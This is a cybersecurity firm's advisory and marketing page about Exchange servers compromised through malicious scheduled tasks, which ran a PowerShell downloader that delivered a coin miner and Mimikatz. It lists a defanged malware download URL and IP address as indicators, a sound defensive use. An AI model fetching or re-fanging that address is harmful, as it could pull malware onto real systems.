When you experience a breach, time is crucial. Our 24/7 Security Operations Center responds immediately with precision to eliminate the threat and restore operations.
ShadowSpear® is an unparalleled resource that defends your organizations against advanced cyber threats and attacks 24/7/365.
Your organization has cybersecurity weaknesses and vulnerabilities you don’t yet even know about. They need to be found and found immediately. If you don’t someone else will.
Under Attack? Breach Response Hotline: Call 833.997.7327 (US/CAN)
Â
Huntress Labs has discovered multiple partners with Exchange servers receiving malicious scheduled tasks that executed a PowerShell downloader from hxxp://p.estonine[.]com/p?e. According to Huntress Labs CEO, Kyle Hanslovan, the server is hosted on Digital Ocean resolves to the IP address 188.166.162[.]201 and it delivers a base64 encoded PowerShell script.
This PowerShell script is similar in comparison to a coin miner campaign discovered by Carbon Black in 2019.
Huntress Labs reported their findings to Digital Ocean and the accompanying registrar NameCheap. After this, they discovered a fifth stage in the malware where two Mimikatz DLLs are embedded within the script which gets loaded or injected. Huntress has discovered over 200 compromised version of Exchange servers due to the vulnerabilities.
SpearTip’s professionals are closely monitoring this situation as it develops. If you have any questions regarding the Exchange Server vulnerabilities, don’t hesitate to reach out to our Security Operations Center at 833.997.7327.
SpearTip’s cyber professionals continuously monitor environments 24/7 in our US-based Security Operations Center. Our certified engineers work in unison with our proprietary endpoint detection and response tool, ShadowSpear®. This allows your organization to have direct communication with our engineers at any moment and a completely transparent view of your risk profile.
Identify, neutralize, and counter cyberattacks - provide confidence in your security posture
24/7 Breach Response: US/CAN: 833.997.7327
Main Office: 800.236.6550
1714 Deer Tracks Trail, Suite 150
St. Louis, MO 63131
©2024 SpearTip, LLC. All rights reserved.